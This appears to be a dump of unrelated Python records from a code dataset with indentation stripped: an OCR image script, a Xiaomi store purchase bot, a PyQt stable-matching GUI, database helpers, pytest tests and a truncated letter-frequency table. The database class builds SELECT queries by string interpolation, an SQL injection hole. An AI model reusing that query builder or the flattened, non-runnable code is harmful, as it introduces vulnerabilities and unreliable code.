#cv2.imwrite('./ocr/test_images/contours/'+basename+'prepixelcrop.jpg', test_img)
#test_img = test_img[10:h-10, 10: w-10]
#y_nonzero, x_nonzero = np.nonzero(test_img)
#test_img = test_img[np.min(y_nonzero):np.max(y_nonzero), np.min(x_nonzero):np.max(x_nonzero)]
test_img = invert(test_img)
test_img = dilateDirection(test_img)
#contours,hierarchy = cv2.findContours(test_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
#cnt = contours[0]
#x,y,w,h = cv2.boundingRect(cnt)
#test_img = cv2.rectangle(img,(10,10),(w-10, h-10), GREEN, LINE_THICKNESS)
#test_img = cv2.drawContours(test_img, contours, -1, GREEN, LINE_THICKNESS)
#crop = test_img[y:y+h,x:x+w]
cv2.imwrite('./ocr/test_images/contours/'+basename+'dilated.jpg', test_img)
'''
for r in range(0, 40, 5):
name = 'rank=' + str(r) + ".jpg"
path = './ocr/test_images/' + name
new_img = ndimage.rank_filter(test_img, rank=r, size=20)
print("writing " + name)
cv2.imwrite(path, new_img)
'''
#cv2.imwrite('./ocr/test_images/inverted.jpg', test_img)
if __name__ == "__main__":
print("STARTING")
for f in os.listdir('./ocr/data/gb19gw39h/'):
if f.endswith(".jpg"):
#test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
createColumnImages(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0], './ocr/columns/gb19gw39h/')
for f in os.listdir('./ocr/data/8k71pf94q/'):
if f.endswith(".jpg"):
#test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0], './ocr/columns/8k71pf94q/')
for f in os.listdir('./ocr/data/mc87rq85m/'):
if f.endswith(".jpg"):
#test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])
createColumnImages(cv2.imread(os.path.join('./ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0], './ocr/columns/mc87rq85m/')
'''
data_folder = './ocr/data/'
for folder in os.listdir(data_folder):
if folder == ".DS_Store":
continue
for file in os.listdir(os.path.join(data_folder, folder)):
if file.endswith(".jpg"):
print("calling test() on " + file)
#test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])
createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')
for f in os.listdir('./ocr/data/8k71pr786/'):
if f.endswith(".jpg"):
for d in range(550, 850, 50):
createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), '8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)
#createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')
'''
|
4,334 | 1e87f625fb7bd9f9bf4233229332c909702954a5 | from helper import *
async def main(URL, buy_time):
browser, page = await get_window()
# 30s登陆时间
await page.goto('https://account.xiaomi.com/pass/serviceLogin?callback=http%3A%2F%2Forder.mi.com%2Flogin%2Fcallback%3Ffollowup%3Dhttps%253A%252F%252Fwww.mi.com%252F%26sign%3DNzY3MDk1YzczNmUwMGM4ODAxOWE0NjRiNTU5ZGQyMzFhYjFmOGU0Nw%2C%2C&sid=mi_eshop&_bannerBiz=mistore&_qrsize=180')
await asyncio.sleep(30)
# 选款式时间10s
await page.goto(URL)
await asyncio.sleep(10)
await sleep_time(buy_time)
old_url = page.url
#加入购物车
while True:
index = 0
try:
print(f'重试 {index}')
# 找到“加入购物车”,点击
await page.click('[class="btn btn-primary"]')
break
except:
index += 1
await asyncio.sleep(CLICK_FREQUENCY)
# 等待页面跳转
while True:
if page.url != old_url:
break
await asyncio.sleep(CLICK_FREQUENCY)
while True:
try:
# 找到“进入购物车”,点击
await page.click('[class="btn btn-primary"]')
break
except:
await asyncio.sleep(CLICK_FREQUENCY)
# 付款
await asyncio.sleep(100)
await close_window(browser)
if __name__ == '__main__':
URL = input('宝贝链接:\n')
buy_time = input('请输入开售时间 【2020-02-06(空格)12:55:50】\n')
asyncio.run(main(URL, buy_time)) |
4,335 | edbb721784dff81e3e1ab5e0458a4080508807fe | # -*- coding:utf-8 -*-
import sys
from PyQt4 import QtGui,QtCore
import experiment
class Node(QtGui.QGraphicsEllipseItem):
def __init__(self,name):
super(Node, self).__init__()
self.__name = name
def getName(self):
return self.__name
def changeBrush(self, color, style):
b = QtGui.QBrush()
b.setStyle(style)
c = b.color()
c.setRgb(color[0],color[1],color[2])
b.setColor(c)
self.setBrush(b)
class Link(QtGui.QGraphicsLineItem):
def __init__(self,name,link_type):
super(Link, self).__init__()
self.__link_type = link_type
self.__name = name
def getName(self):
return self.__name
def getType(self):
return self.__link_type
def changeType(self,link_type):
self.__link_type = link_type
def changeColor(self,color):
p = QtGui.QPen()
c = p.color()
c.setRgb(color[0],color[1],color[2])
p.setColor(c)
self.setPen(p)
class Text(QtGui.QGraphicsTextItem):
def __init__(self,name,text):
super(Text, self).__init__(text)
self.__name = name
def getName(self):
return self.__name
class GUI(QtGui.QWidget):
def __init__(self):
super(GUI, self).__init__()
self.exp = experiment.Experiments(20,3)
self.matching = self.exp.unidirectional_match()
self.man_rank, self.woman_rank = self.matching.get_avg_rank()
self.man_spouse, self.woman_spouse = self.matching.get_spouse_rank()
self.initUI()
self.showMaximized()
def initUI(self):
self.setWindowTitle(' Stable Matching ')
grid = QtGui.QGridLayout()
step_button = QtGui.QPushButton('STEP',self)
epoch_button = QtGui.QPushButton('EPOCH',self)
end_button = QtGui.QPushButton('END',self)
self.showText = QtGui.QTextEdit(self)
self.showText.setText('START! ')
self.statu_scene = QtGui.QGraphicsScene(self)
self.initScene(self.statu_scene)
self.statu_view = QtGui.QGraphicsView()
self.statu_view.setScene(self.statu_scene)
self.statu_view.setMinimumSize(600,600)
self.statu_view.show()
self.history_scene = QtGui.QGraphicsScene(self)
self.initScene(self.history_scene)
self.history_view = QtGui.QGraphicsView()
self.history_view.setScene(self.history_scene)
self.history_view.setMinimumSize(600,600)
self.history_view.show()
grid.addWidget(step_button,1,1)
grid.addWidget(epoch_button,2,1)
grid.addWidget(end_button,3,1)
grid.addWidget(self.showText,1,2,4,1)
grid.addWidget(self.statu_view,1,3,4,1)
grid.addWidget(self.history_view,1,4,4,1)
self.setLayout(grid)
self.connect(step_button,QtCore.SIGNAL('clicked()'),self.nextStep)
self.connect(epoch_button,QtCore.SIGNAL('clicked()'),self.nextEpoch)
self.connect(end_button,QtCore.SIGNAL('clicked()'),self.exeToEnd)
def initScene(self,scene):
man_num = self.exp.get_man_num()
woman_num = self.exp.get_woman_num()
length = max(man_num,woman_num) * 30
scene.setSceneRect(0,0,600,length)
for i in range(man_num):
node = self.__addNode(scene, 'M_'+str(i),120,i*30,20,20,(0,0,255))
for i in range(woman_num):
node = self.__addNode(scene, 'W_'+str(i),480,i*30,20,20,(255,0,0))
def __addNode(self, scene, name, x, y, w, h, color=(0,0,0)):
sex = name.split('_')[0]
number = name.split('_')[1]
rank_bias = spouse_bias = rank = 0
if sex == 'M':
rank = self.man_rank[int(number)]
rank_bias = -2.0
spouse_bias = -4.0
elif sex == 'W':
rank = self.woman_rank[int(number)]
rank_bias = 2.0
spouse_bias = 4.0
node = Node(name)
node.setRect(x,y,w,h)
node.changeBrush(color,1)
if int(number) < 10:
number = '0' + number
text = QtGui.QGraphicsTextItem (number, node)
text.setPos(x,y)
text.setTextWidth(1.5*w)
font = QtGui.QFont('Times',8)
font.setWeight(99)
text.setFont(font)
rank_text = QtGui.QGraphicsTextItem (str(rank), node)
rank_text.setPos(x + rank_bias*w,y)
rank_text.setTextWidth(2*w)
font = QtGui.QFont('Times',8)
font.setWeight(99)
rank_text.setFont(font)
spouse_text = Text(name+'_S', '-1')
spouse_text.setPos(x + spouse_bias*w,y)
spouse_text.setTextWidth(1.5*w)
font = QtGui.QFont('Times',8)
font.setWeight(99)
spouse_text.setFont(font)
scene.addItem(node)
scene.addItem(spouse_text)
def __addLink(self, scene, name, node1, node2, color = (0,0,0), link_type = ''):
center1 = node1.boundingRect().center()
center2 = node2.boundingRect().center()
name1 = node1.getName().split('_')[1]
name2 = node2.getName().split('_')[1]
link = Link(name1 + '-' + name2, link_type)
link.setLine(center1.x(),center1.y(),center2.x(),center2.y())
link.changeColor(color)
scene.addItem(link)
def __deleteLink(self, scene, name):
link = self.__findItem(name, Link, scene.items())
scene.removeItem(link)
def __changeText(self, scene, name, text):
txt = self.__findItem(name, Text, scene.items())
txt.setPlainText(text)
def __findItem(self, name, _type, items):
for item in items:
if isinstance(item, _type) and name == item.getName():
return item
return False
def __clearLinks(self, scene):
for item in scene.items():
if isinstance(item,Link) and item.getType() != 'marry':
scene.removeItem(item)
def __clearUpLinks(self, scene):
for item in scene.items():
if isinstance(item, Link):
scene.removeItem(item)
def __refreshViewStep(self, info):
record = info.split('\n')
length = len(record)
lineiter = 0
epoch = record[lineiter].strip().split(':')[1]
lineiter += 1
step = record[lineiter].strip().split(':')[1]
lineiter += 1
statu = record[lineiter].strip()
if 'DONE' in statu:
return 0
elif 'is not activity' in statu:
return 1
elif 'is married' in statu:
return 2
couple = statu.replace(' ','').split('target')
man = self.__findItem('M_'+couple[0], Node, self.statu_scene.items())
woman = self.__findItem('W_'+couple[1], Node, self.statu_scene.items())
lineiter += 1
sui_rank = record[lineiter].replace(' ','').split(':')[1]
lineiter += 1
if 'Husband Rank' in record[lineiter]:
husband_rank = record[lineiter].replace(' ','').split(':')[1]
lineiter += 1
if 'Succeed' in record[lineiter]:
self.__addLink(self.statu_scene, couple[0] + '-' + couple[1], man, woman, link_type = 'marry')
self.__addLink(self.history_scene, couple[0] + '-' + couple[1], man, woman, link_type = 'marry')
self.__changeText(self.statu_scene, 'M_' + couple[0] + '_S', str(self.matching.get_spouse_rank(int(couple[0]) + 1)))
self.__changeText(self.statu_scene, 'W_' + couple[1] + '_S', str(self.matching.get_spouse_rank(-(int(couple[1]) + 1))))
self.__changeText(self.history_scene, 'M_' + couple[0] + '_S', str(self.matching.get_spouse_rank(int(couple[0]) + 1)))
self.__changeText(self.history_scene, 'W_' + couple[1] + '_S', str(self.matching.get_spouse_rank(-(int(couple[1]) + 1))))
lineiter += 1
if lineiter <= length:
if 'threw away' in record[lineiter]:
throwCouple = record[lineiter].replace(' ','').split('threwaway')
node1 = self.__findItem('M_' + throwCouple[1], Node, self.history_scene.items())
node2 = self.__findItem('W_' + throwCouple[0], Node, self.history_scene.items())
self.__addLink(self.history_scene, throwCouple[1] + '-' + throwCouple[0], node1, node2, (0,255,0) , 'break')
self.__deleteLink(self.statu_scene, throwCouple[1] + '-' + throwCouple[0])
self.__changeText(self.statu_scene, 'M_' + throwCouple[1] + '_S', '-1')
self.__changeText(self.history_scene, 'M_' + throwCouple[1] + '_S', '-1')
self.statu_view.update()
self.history_view.update()
elif 'Failed' in record[lineiter]:
self.__addLink(self.history_scene, couple[0] + '-' + couple[1], man, woman, (0,0,255) , 'failed')
self.statu_view.update()
self.history_view.update()
def nextStep(self):
info = self.matching.step()
self.showText.setText(info)
self.__clearLinks(self.statu_scene)
self.__clearUpLinks(self.history_scene)
self.__refreshViewStep(info)
def nextEpoch(self):
info = self.matching.epoch()
self.__clearLinks(self.statu_scene)
self.__clearUpLinks(self.history_scene)
sep = info.split('\n')[0]
records = info.split(sep+'\n')
del records[0]
for record in records:
self.__refreshViewStep(sep+'\n'+record)
self.showText.setText(info)
def exeToEnd(self):
info = self.matching.exe_to_end()
self.__clearLinks(self.statu_scene)
self.__clearUpLinks(self.history_scene)
records = info.split('EPOCH')
del records[0]
for record in records:
self.__refreshViewStep('EPOCH'+record)
self.showText.setText(info)
def closeEvent(self, event):
reply = QtGui.QMessageBox.question(self, 'Message',
'Are you sure to quit?', QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
event.accept()
else:
event.ignore()
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
gui = GUI()
gui.show()
sys.exit(app.exec_())
|
4,336 | 2c1e51f2c392e77299463d95a2277b3d2ca7c299 | print(1/2 * 2) # division ret
|
4,337 | 8339ac512d851ea20938a1fbeedcb751cb2b8a6a | from psycopg2 import ProgrammingError, IntegrityError
import datetime
from loguru import logger
from db.connect import open_cursor, open_connection
_log_file_name = __file__.split("/")[-1].split(".")[0]
logger.add(f"logs/{_log_file_name}.log", rotation="1 day")
class DataTypeSaveError(Exception):
pass
class TypeValidationError(Exception):
pass
class MultipleRowsError(Exception):
pass
class DoesNotExist(Exception):
pass
type_map = {str: "%s", int: "%d", float: "%f"}
class BaseDataClass:
def _create_insert_query(self):
column_names = ""
row_values = ""
values = []
for column_name, row_value in self.__dict__.items():
if column_name.startswith("_"):
continue
if column_name == "id" and row_value is None:
# If id is None, leave it to the db to deal with incrementing the pk.
continue
column_names += str(column_name) + ", "
row_values += "%s, "
values.append(row_value)
columns = "(" + column_names[:-2] + ")"
values_reprs = "(" + row_values[:-2] + ")"
query = f"INSERT INTO {self._table_name} {columns} VALUES {values_reprs} RETURNING id;"
return query, values
@classmethod
def _create_select_query(cls, **kwargs):
key_value_pairs = ""
for key, value in kwargs.items():
if value is None:
continue
key_value_pairs += f"{key} = '{value}' AND "
key_value_pairs = key_value_pairs[:-5]
query = f"SELECT * FROM {cls._table_name} WHERE {key_value_pairs};"
return query
def save(self, commit=True, with_get=True):
"""Store conent to database.
This should be thread safe by using asyncio's Lock in open_cursor.
"""
self.validate()
logger.debug(f"Save: {self}")
query, values = self._create_insert_query()
with open_connection() as conn:
with open_cursor(conn) as cursor:
try:
cursor.execute(query, tuple(values))
if with_get:
_id = cursor.fetchone()[0]
logger.debug(f"Saved value with id: {_id}")
self.id = _id or self.id
if not self.id:
logger.warning(f"Returned with an empty id. {self}")
if commit:
conn.commit()
except ProgrammingError as e:
logger.error(e)
raise DataTypeSaveError
except IntegrityError as e:
logger.warning(f"Could not save: {self}")
logger.error(e)
return self
def clean(self):
logger.debug(f"Cleaning: {self}")
def validate(self):
annotations = self.__annotations__
keys_ = annotations.keys()
fields = self.__dict__
for key in keys_:
if not isinstance(fields[key], annotations[key]):
if key == "id" and fields[key] is None:
# Pass None to id and allow the DB to increment it.
continue
if key in self._ignore_fields:
continue
try:
self.__dict__[key] = annotations[key](fields[key])
except (TypeError, ValueError) as e:
logger.error(
f"Encountered wrong type for {key}, got {type(fields[key])} but expected: {annotations[key]}."
)
logger.error(e)
raise TypeValidationError(
f"Encountered wrong type for {key}, got {type(fields[key])} but expected: {annotations[key]}."
)
@classmethod
def prepare(cls, *args):
return args
@classmethod
def create(cls, with_get=False, **kwargs):
inst = cls(**kwargs)
inst.clean()
inst.save(with_get=with_get)
return inst
@classmethod
def _get_rows(cls, **kwargs):
logger.debug(f"{cls}._get_rows")
query = cls._create_select_query(**kwargs)
with open_connection() as conn:
with open_cursor(conn) as cursor:
cursor.execute(query)
rows = cursor.fetchall()
return rows
@classmethod
def all(cls, **kwargs):
logger.debug(f"Get all: {cls}")
rows = cls._get_rows(**kwargs)
instances = []
for row in rows:
instances.append(cls(*row))
return instances
@classmethod
def get(cls, **kwargs):
logger.debug(f"Get: {cls}")
rows = cls._get_rows(**kwargs)
logger.debug(f"Rows: {rows}")
if not rows:
raise DoesNotExist(f"{cls}({kwargs}")
if len(rows) > 1:
raise MultipleRowsError(f"Got {len(rows)} entries in {cls}.get()")
if isinstance(rows, list):
row = rows[0]
else:
row = rows
return cls(*row)
def get_id(self):
logger.debug(f"Get own id: {self}.")
return self.__class__.get(**self.__dict__).id
|
4,338 | b6715ad42d59720eb021973394a0b7bfd540181b | from .standup import *
from .auth_register import *
from .channels_create import *
import pytest
# If channel does not exist
def test_notExisting_channel():
db.reset_DB()
auth_register('testmail@gmail.com', 'pas123456', 'Bob', 'Smith')
realtoken = Token.generateToken('testmail@gmail.com')
fake_channel = 70
with pytest.raises(ValueError):
standup_start(realtoken, fake_channel, 5)
# If channel does exist
def test_existing_channel_1():
db.reset_DB()
auth_register('testmail@gmail.com', 'pas123456', 'Bob', 'Smith')
realtoken = Token.generateToken('testmail@gmail.com')
channel_id = channels_create(realtoken,'Channel', True)
assert(standup_start(realtoken, 1, 5))
# if the user is not a member of the channel
def test_message_not_member():
db.reset_DB()
admintoken = Token.generateToken('admin@gmail.com')
channel_id = channels_create(admintoken,'Channel', True)
auth_register('testmail@gmail.com', 'pas123456', 'Bob', 'Smith')
realtoken = Token.generateToken('testmail@gmail.com')
with pytest.raises(AccessError):
standup_start(realtoken, 1, 5)
# If channel does exist and user member of channel
def test_existing_channel_2():
db.reset_DB()
auth_register('testmail@gmail.com', 'pas123456', 'Bob', 'Smith')
realtoken = Token.generateToken('testmail@gmail.com')
channel_id = channels_create(realtoken,'Channel', True)
assert(standup_start(realtoken, 1, 5))
|
4,339 | f254f93193a7cb7ed2e55e4481ed85821cafcd7b | TOTAL = 1306336
ONE = {
'0': 1473,
'1': 5936,
'2': 3681,
'3': 2996,
'4': 2480,
'5': 2494,
'6': 1324,
'7': 1474,
'8': 1754,
'9': 1740,
'a': 79714,
'b': 83472,
'c': 78015,
'd': 61702,
'e': 42190,
'f': 68530,
'g': 48942,
'h': 63661,
'i': 34947,
'j': 24312,
'k': 26724,
'l': 66351,
'm': 77245,
'n': 36942,
'o': 40744,
'p': 68978,
'q': 6750,
'r': 49135,
's': 116034,
't': 87440,
'u': 19423,
'v': 22356,
'w': 50718,
'x': 6079,
'y': 13089,
'z': 7491,
}
TWO = {
'0-': 19,
'00': 145,
'01': 143,
'02': 212,
'03': 90,
'04': 61,
'05': 241,
'06': 31,
'07': 151,
'08': 104,
'09': 99,
'0a': 8,
'0b': 8,
'0c': 16,
'0d': 18,
'0e': 8,
'0f': 7,
'0g': 5,
'0h': 4,
'0i': 9,
'0j': 1,
'0k': 4,
'0l': 2,
'0m': 8,
'0n': 10,
'0o': 6,
'0p': 10,
'0r': 10,
'0s': 10,
'0t': 6,
'0u': 5,
'0v': 5,
'0w': 5,
'0x': 4,
'0y': 3,
'0z': 5,
'1-': 177,
'10': 983,
'11': 537,
'12': 767,
'13': 327,
'14': 270,
'15': 257,
'16': 276,
'17': 318,
'18': 505,
'19': 280,
'1a': 61,
'1b': 58,
'1c': 84,
'1d': 52,
'1e': 33,
'1f': 32,
'1g': 38,
'1h': 44,
'1i': 25,
'1j': 13,
'1k': 32,
'1l': 33,
'1m': 59,
'1n': 39,
'1o': 37,
'1p': 68,
'1q': 7,
'1r': 21,
'1s': 336,
'1t': 54,
'1u': 15,
'1v': 14,
'1w': 53,
'1x': 7,
'1y': 14,
'1z': 10,
'2-': 30,
'20': 889,
'21': 406,
'22': 228,
'23': 172,
'24': 480,
'25': 177,
'26': 126,
'27': 96,
'28': 108,
'29': 73,
'2a': 50,
'2b': 94,
'2c': 59,
'2d': 61,
'2e': 29,
'2f': 29,
'2g': 47,
'2h': 24,
'2i': 22,
'2j': 13,
'2k': 27,
'2l': 35,
'2m': 62,
'2n': 53,
'2o': 22,
'2p': 48,
'2q': 7,
'2r': 14,
'2s': 53,
'2t': 43,
'2u': 20,
'2v': 7,
'2w': 43,
'2x': 21,
'2y': 7,
'2z': 6,
'3-': 53,
'30': 292,
'31': 224,
'32': 188,
'33': 179,
'34': 91,
'35': 153,
'36': 367,
'37': 101,
'38': 122,
'39': 118,
'3a': 50,
'3b': 45,
'3c': 37,
'3d': 350,
'3e': 17,
'3f': 26,
'3g': 125,
'3h': 27,
'3i': 11,
'3j': 9,
'3k': 19,
'3l': 25,
'3m': 45,
'3n': 17,
'3o': 15,
'3p': 32,
'3q': 12,
'3r': 72,
'3s': 53,
'3t': 28,
'3u': 3,
'3v': 13,
'3w': 36,
'3x': 17,
'3y': 14,
'3z': 10,
'4-': 76,
'40': 357,
'41': 259,
'42': 170,
'43': 88,
'44': 126,
'45': 102,
'46': 67,
'47': 56,
'48': 97,
'49': 62,
'4a': 41,
'4b': 49,
'4c': 55,
'4d': 53,
'4e': 51,
'4f': 43,
'4g': 52,
'4h': 44,
'4i': 19,
'4j': 13,
'4k': 22,
'4l': 48,
'4m': 62,
'4n': 22,
'4o': 21,
'4p': 60,
'4q': 11,
'4r': 26,
'4s': 94,
'4t': 44,
'4u': 40,
'4v': 17,
'4w': 45,
'4x': 58,
'4y': 24,
'4z': 6,
'5-': 30,
'50': 323,
'51': 574,
'52': 361,
'53': 79,
'54': 155,
'55': 141,
'56': 109,
'57': 66,
'58': 85,
'59': 87,
'5a': 32,
'5b': 17,
'5c': 21,
'5d': 39,
'5e': 7,
'5f': 17,
'5g': 21,
'5h': 10,
'5i': 54,
'5j': 4,
'5k': 16,
'5l': 19,
'5m': 22,
'5n': 8,
'5o': 12,
'5p': 27,
'5q': 4,
'5r': 9,
'5s': 55,
'5t': 38,
'5u': 17,
'5v': 5,
'5w': 5,
'5x': 9,
'5y': 10,
'5z': 6,
'6-': 42,
'60': 173,
'61': 182,
'62': 63,
'63': 56,
'64': 51,
'65': 125,
'66': 134,
'67': 62,
'68': 58,
'69': 105,
'6a': 12,
'6b': 7,
'6c': 11,
'6d': 61,
'6e': 6,
'6f': 15,
'6g': 7,
'6h': 11,
'6i': 6,
'6j': 1,
'6k': 7,
'6l': 8,
'6m': 16,
'6n': 1,
'6o': 5,
'6p': 12,
'6q': 6,
'6r': 15,
'6s': 28,
'6t': 12,
'6u': 2,
'6v': 2,
'6w': 8,
'6x': 5,
'6y': 9,
'7-': 34,
'70': 200,
'71': 205,
'72': 81,
'73': 58,
'74': 53,
'75': 59,
'76': 69,
'77': 191,
'78': 92,
'79': 48,
'7a': 33,
'7b': 18,
'7c': 28,
'7d': 31,
'7e': 13,
'7f': 15,
'7g': 11,
'7h': 15,
'7i': 7,
'7j': 8,
'7k': 16,
'7l': 19,
'7m': 15,
'7n': 5,
'7o': 13,
'7p': 10,
'7q': 2,
'7r': 4,
'7s': 33,
'7t': 37,
'7u': 2,
'7v': 3,
'7w': 13,
'7x': 13,
'7y': 12,
'7z': 8,
'8-': 61,
'80': 336,
'81': 180,
'82': 61,
'83': 62,
'84': 99,
'85': 85,
'86': 138,
'87': 85,
'88': 339,
'89': 78,
'8a': 11,
'8b': 16,
'8c': 9,
'8d': 10,
'8e': 6,
'8f': 10,
'8g': 18,
'8h': 7,
'8i': 12,
'8j': 4,
'8k': 6,
'8l': 6,
'8m': 11,
'8n': 2,
'8o': 8,
'8p': 15,
'8q': 7,
'8r': 10,
'8s': 18,
'8t': 24,
'8u': 3,
'8v': 2,
'8w': 4,
'8x': 1,
'8y': 6,
'8z': 4,
'9-': 45,
'90': 173,
'91': 275,
'92': 149,
'93': 59,
'94': 76,
'95': 82,
'96': 76,
'97': 123,
'98': 74,
'99': 270,
'9a': 19,
'9b': 9,
'9c': 22,
'9d': 17,
'9e': 10,
'9f': 5,
'9g': 16,
'9h': 6,
'9i': 20,
'9j': 10,
'9k': 9,
'9l': 13,
'9m': 19,
'9n': 8,
'9o': 8,
'9p': 29,
'9q': 3,
'9r': 11,
'9s': 22,
'9t': 26,
'9u': 3,
'9v': 8,
'9w': 11,
'9x': 21,
'9y': 8,
'9z': 5,
'a-': 307,
'a0': 6,
'a1': 172,
'a2': 58,
'a3': 25,
'a4': 16,
'a5': 9,
'a6': 8,
'a7': 20,
'a8': 12,
'a9': 15,
'aa': 778,
'ab': 3124,
'ac': 4416,
'ad': 5316,
'ae': 537,
'af': 1343,
'ag': 4563,
'ah': 760,
'ai': 5617,
'aj': 331,
'ak': 715,
'al': 9102,
'am': 4388,
'an': 8462,
'ao': 351,
'ap': 2155,
'aq': 426,
'ar': 9178,
'as': 6419,
'at': 4007,
'au': 2485,
'av': 1218,
'aw': 1869,
'ax': 403,
'ay': 457,
'az': 646,
'b-': 148,
'b0': 7,
'b1': 19,
'b2': 94,
'b3': 12,
'b4': 24,
'b5': 9,
'b6': 4,
'b7': 5,
'b8': 2,
'b9': 6,
'ba': 15356,
'bb': 477,
'bc': 323,
'bd': 266,
'be': 14064,
'bf': 200,
'bg': 189,
'bh': 311,
'bi': 11911,
'bj': 604,
'bk': 178,
'bl': 5297,
'bm': 306,
'bn': 218,
'bo': 11986,
'bp': 229,
'bq': 103,
'br': 5001,
'bs': 317,
'bt': 266,
'bu': 12643,
'bv': 126,
'bw': 147,
'bx': 91,
'by': 2394,
'bz': 139,
'c-': 120,
'c0': 13,
'c1': 21,
'c2': 78,
'c3': 34,
'c4': 30,
'c5': 6,
'c6': 4,
'c7': 10,
'c8': 4,
'c9': 8,
'ca': 18400,
'cb': 368,
'cc': 678,
'cd': 484,
'ce': 3579,
'cf': 300,
'cg': 253,
'ch': 11318,
'ci': 2463,
'cj': 218,
'ck': 165,
'cl': 5881,
'cm': 371,
'cn': 895,
'co': 15790,
'cp': 497,
'cq': 239,
'cr': 5502,
'cs': 1710,
'ct': 364,
'cu': 6370,
'cv': 200,
'cw': 201,
'cx': 142,
'cy': 1053,
'cz': 246,
'd-': 147,
'd0': 7,
'd1': 14,
'd2': 37,
'd3': 29,
'd4': 10,
'd5': 5,
'd6': 4,
'd7': 8,
'd8': 6,
'd9': 7,
'da': 9910,
'db': 288,
'dc': 410,
'dd': 303,
'de': 11362,
'df': 288,
'dg': 307,
'dh': 280,
'di': 10934,
'dj': 682,
'dk': 157,
'dl': 393,
'dm': 361,
'dn': 476,
'do': 10944,
'dp': 211,
'dq': 106,
'dr': 6965,
'ds': 393,
'dt': 262,
'du': 4853,
'dv': 376,
'dw': 211,
'dx': 157,
'dy': 630,
'dz': 169,
'e-': 1066,
'e0': 9,
'e1': 12,
'e2': 26,
'e3': 27,
'e4': 11,
'e5': 2,
'e6': 6,
'e7': 6,
'e8': 37,
'e9': 5,
'ea': 6784,
'eb': 771,
'ec': 1530,
'ed': 2674,
'ee': 257,
'ef': 482,
'eg': 508,
'eh': 276,
'ei': 552,
'ej': 151,
'ek': 329,
'el': 3657,
'em': 1785,
'en': 4879,
'eo': 205,
'ep': 613,
'eq': 553,
'er': 2767,
'es': 1797,
'et': 766,
'eu': 1095,
'ev': 2975,
'ew': 218,
'ex': 2521,
'ey': 2066,
'ez': 772,
'f-': 75,
'f0': 6,
'f1': 54,
'f2': 25,
'f3': 5,
'f4': 9,
'f5': 12,
'f6': 2,
'f7': 4,
'f8': 10,
'f9': 2,
'fa': 12917,
'fb': 165,
'fc': 272,
'fd': 154,
'fe': 8514,
'ff': 195,
'fg': 107,
'fh': 175,
'fi': 14464,
'fj': 192,
'fk': 90,
'fl': 7482,
'fm': 210,
'fn': 114,
'fo': 8864,
'fp': 132,
'fq': 77,
'fr': 7566,
'fs': 413,
'ft': 252,
'fu': 5259,
'fv': 88,
'fw': 129,
'fx': 197,
'fy': 155,
'fz': 143,
'g-': 138,
'g0': 21,
'g1': 38,
'g2': 26,
'g3': 34,
'g4': 26,
'g5': 11,
'g6': 5,
'g7': 5,
'g8': 15,
'g9': 5,
'ga': 8708,
'gb': 232,
'gc': 262,
'gd': 339,
'ge': 5489,
'gf': 176,
'gg': 245,
'gh': 399,
'gi': 3752,
'gj': 108,
'gk': 138,
'gl': 2606,
'gm': 387,
'gn': 217,
'go': 9782,
'gp': 455,
'gq': 78,
'gr': 8101,
'gs': 381,
'gt': 252,
'gu': 5335,
'gv': 138,
'gw': 202,
'gx': 176,
'gy': 265,
'gz': 395,
'h-': 120,
'h0': 6,
'h1': 14,
'h2': 149,
'h3': 15,
'h4': 28,
'h5': 6,
'h6': 3,
'h7': 2,
'h8': 8,
'h9': 2,
'ha': 16216,
'hb': 351,
'hc': 228,
'hd': 442,
'he': 12087,
'hf': 180,
'hg': 158,
'hh': 243,
'hi': 10582,
'hj': 147,
'hk': 331,
'hl': 215,
'hm': 214,
'hn': 317,
'ho': 14380,
'hp': 207,
'hq': 147,
'hr': 318,
'hs': 380,
'ht': 314,
'hu': 4226,
'hv': 119,
'hw': 147,
'hx': 150,
'hy': 943,
'hz': 266,
'i-': 527,
'i0': 9,
'i1': 8,
'i2': 34,
'i3': 14,
'i4': 17,
'i5': 4,
'i6': 6,
'i7': 12,
'i8': 8,
'i9': 11,
'ia': 606,
'ib': 659,
'ic': 2175,
'id': 1981,
'ie': 282,
'if': 1514,
'ig': 488,
'ih': 370,
'ii': 226,
'ij': 122,
'ik': 351,
'il': 2287,
'im': 2155,
'in': 10117,
'io': 344,
'ip': 818,
'iq': 154,
'ir': 1037,
'is': 2803,
'it': 4514,
'iu': 135,
'iv': 328,
'iw': 391,
'ix': 87,
'iy': 123,
'iz': 230,
'j-': 143,
'j0': 7,
'j1': 2,
'j2': 20,
'j3': 8,
'j4': 10,
'j5': 1,
'j6': 1,
'j7': 2,
'j8': 3,
'j9': 2,
'ja': 3167,
'jb': 251,
'jc': 336,
'jd': 290,
'je': 2239,
'jf': 152,
'jg': 136,
'jh': 228,
'ji': 1541,
'jj': 266,
'jk': 191,
'jl': 249,
'jm': 340,
'jn': 230,
'jo': 7930,
'jp': 278,
'jq': 82,
'jr': 261,
'js': 448,
'jt': 174,
'ju': 4460,
'jv': 125,
'jw': 191,
'jx': 200,
'jy': 202,
'jz': 146,
'k-': 110,
'k0': 7,
'k1': 29,
'k2': 30,
'k3': 14,
'k4': 5,
'k5': 7,
'k6': 5,
'k7': 7,
'k8': 4,
'k9': 32,
'ka': 3724,
'kb': 212,
'kc': 275,
'kd': 182,
'ke': 6054,
'kf': 130,
'kg': 137,
'kh': 420,
'ki': 6316,
'kj': 144,
'kk': 167,
'kl': 487,
'km': 248,
'kn': 2612,
'ko': 1868,
'kp': 181,
'kq': 59,
'kr': 785,
